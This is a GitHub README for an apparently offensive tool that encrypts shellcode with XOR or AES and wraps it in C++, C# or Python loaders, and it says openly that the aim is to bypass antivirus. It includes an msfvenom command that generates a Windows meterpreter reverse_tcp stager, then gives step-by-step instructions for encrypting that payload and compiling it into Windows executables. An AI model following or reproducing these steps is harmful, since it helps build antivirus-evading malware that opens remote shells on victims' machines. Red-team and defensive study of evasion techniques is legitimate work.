Skip to content
Switch branches/tags

Latest commit


Git stats


Failed to load latest commit information.
Latest commit message
Commit time

Mutlibyte XOR or AES encrypted shellcode

Author: Arno0x0x - @Arno0x0x

These little proof of concept are inspired by this blogpost: Bypass antivirus with 10 lines of code

The technique uses two kind of code file:

  1. The shellcode encoder/encrypter:
  2. Various shellcode wrapper, in C++, C# and Python:
    • encryptedShellcodeWrapper.cpp - for now supports only XOR encryption
    • encryptedShellcodeWrapper.cs - supports both XOR and AES encryption
    • - supports both XOR and AES encryption


Installation is straight forward:

  • Git clone this repository: git clone ShellcodeWrapper
  • cd into the ShellcodeWrapper folder: cd ShellcodeWrapper
  • Install requirements using pip install -r requirements.txt
  • Give the execution rights to the main script: chmod +x


First, you need to obtain a usable shellcode from metasploit (run it from a Kali distribution), for example:

root@kali:~# msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -f raw > shellcode.raw

In this example, the output is a raw (unencoded & unencrypted) reverse_tcp meterpreter stager for x86 platform. You should adapt it to your needs (payload and parameters).

Second, run the script along with the desired arguments:

  • raw shellcode filename
  • encryption key
  • encryption type: xor or aes
  • desired output: base64, cpp, csharp, python

For instance, to xor encrypt the shellcode with the key 'thisismykey' and get an output code file in C#, C++ and Python:

root@kali:~# ./ -cpp -cs -py shellcode.raw thisismykey xor

This will generate C#, C++ and Python code file in the result folder. Those files are ready to use/compile.


  1. For the C++ wrapper, compile the C++ code file into a Windows executable: you can create a new VisualStudio project for Win32 console application and use the C++ code provided as the main file. Any other method of compilation will require slight adjustment of the C++ code (headers mostly).
  2. For the C# wrapper, compile the C# code file into a Windows executable: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:multibyteEncodeShellcode.exe multibyteEncodeShellcode.cs
  3. For the Python wrapper, just run it as a python script, or use PyInstaller to make it a Windows standalone executable


Shellcode wrapper with encryption for multiple target languages






No releases published


No packages published